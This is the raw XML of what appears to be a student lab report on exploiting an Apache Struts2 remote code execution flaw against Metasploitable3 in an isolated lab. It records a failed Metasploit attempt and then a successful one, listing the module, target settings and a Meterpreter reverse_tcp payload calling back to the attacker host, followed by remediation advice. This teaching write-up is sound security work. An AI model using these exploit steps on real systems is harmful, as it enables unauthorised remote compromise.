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hack" w:hAnsi="hack"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Detailed Vulnerability Exploitation Report - Apache Struts RCE Lab</w:t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1. Introduction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This report documents the full vulnerability assessment and exploitation process conducted on Metasploitable3. It includes both unsuccessful and successful exploitation attempts, highlighting troubleshooting and methodology.</w:t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2. Lab Environment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Attacker: Kali Linux (192.168.56.103)</w:t>
        <w:br/>
        <w:t>Target: Metasploitable3 Ubuntu (192.168.56.10)</w:t>
        <w:br/>
        <w:t>Network: Host-only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5731510" cy="28416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171450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>225425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Tools Used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Nmap, Gobuster, Metasploit Framework, Jetty Runner, Apache Struts2 Showcase</w:t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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Reconnaissance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Nmap scan identified multiple services including HTTP (80), Jetty (8080), FTP, SSH, and MySQL.</w:t>
        <w:br/>
        <w:t>Port 8080 was selected for further testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0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-28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>313690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"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 xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Enumeration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Gobuster was used on port 8080 but revealed no useful endpoints, indicating no pre-existing Struts app.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. Vulnerable Application Deployment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A vulnerable Apache Struts2 Showcase application was manually deployed using Jetty Runner.</w:t>
        <w:br/>
        <w:t>Java compatibility issues were resolved by installing Java 7.</w:t>
        <w:br/>
        <w:t>Application was successfully hosted on port 8080.</w:t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-19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>752475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. Failed Exploitation Attempt (Assignment Requirement)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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The assignment required using the module:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/http/struts_code_exec.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Configuration Attempted:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.10</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RPORT:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">URI: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/struts2-showcase</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Issues Encountered:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Module defaulted to 'Windows Universal'</w:t>
        <w:br/>
        <w:t>Linux payloads (meterpreter, reverse_bash, reverse_netcat) were not compatible</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Error: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'payload is not a compatible payload'</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>This exploit module is outdated and supports limited payloads, making it unsuitable for the deployed Linux-based Struts application.</w:t>
        <w:br/>
        <w:t>This attempt demonstrates proper troubleshooting and validation of exploit c</w:t>
      </w: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95250</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4785995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="284162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ack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ompatibility.</w:t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8. Successful Exploitation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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A more suitable exploit module was used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>exploit/multi/http/struts2_content_type_ognl</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configuration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>set RHOSTS 192.168.56.10</w:t>
        <w:br/>
        <w:t>set RPORT 8080</w:t>
        <w:br/>
        <w:t>set TARGETURI /struts2-showcase</w:t>
        <w:br/>
        <w:t>set payload linux/x86/meterpreter/reverse_tcp</w:t>
        <w:br/>
        <w:t>set LHOST 192.168.56.103</w:t>
        <w:br/>
        <w:t>set LPORT 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t>Execution resulted in a successful Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0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28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>172085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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9. Results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A Meterpreter session was established, confirming remote code execution.</w:t>
        <w:br/>
        <w:t>Commands like 'whoami' and 'sysinfo' validated system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/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0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>240030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="322389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10. Impact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The vulnerability allows full system compromise, command execution, and lateral movement.</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Score: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9.8 (Critical)</w:t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11. Remediation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Update Apache Struts, apply patches, use WAF, and follow secure coding practices.</w:t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12. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The lab successfully demonstrated both failed and successful exploitation paths, reinforcing the importance of selecting appropriate exploit modules and adapting to real-world constraints.</w:t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1906" w:h="16838"/>
      <w:pgMar w:left="1440" w:right="1440" w:gutter="0" w:header="576" w:top="1440" w:footer="432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ack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1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2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1" distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="8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9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1" distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="8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0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ＭＳ ゴシック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ＭＳ ゴシック" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:themeColor="accent1" w:themeShade="bf"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Arial" w:cs="Arial"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-IN" w:bidi="ar-SA"/>
    </w:rPr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Application>LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>7</Pages>
  <Words>320</Words>
  <Characters>2279</Characters>
  <CharactersWithSpaces>2610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2026-03-31T05:00:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T03:21:19Z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